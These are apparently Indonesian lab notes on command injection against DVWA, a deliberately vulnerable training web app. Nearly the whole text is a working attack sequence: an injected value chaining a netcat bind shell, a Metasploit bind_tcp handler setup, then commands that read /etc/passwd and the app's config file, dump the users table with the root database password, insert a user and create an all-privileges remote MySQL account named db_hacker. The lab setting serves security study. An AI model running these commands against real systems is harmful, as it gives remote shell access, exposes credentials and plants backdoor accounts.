Command Injection (catatan lab DVWA)
Pakai cara biasa (netcat) :
server :
$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
client :
nc $ip_server 4444
Pakai Metasploit :
server :
$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
client :
msfconsole
masukkan IP server (nilai RHOST di bawah)
use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.43.207
exploit
Beberapa instruksi bagus (dijalankan lewat shell di atas; memperlihatkan apa saja yang terjangkau oleh user web server) :
whoami
grep apache /etc/passwd
grep apache /etc/group
ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/dvwa
ls -l /var/www/html/dvwa
ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot
-pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT
OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
mysql -u db_hacker -h 192.168.43.207 -p
show databases;
quit
date
echo "Your Name"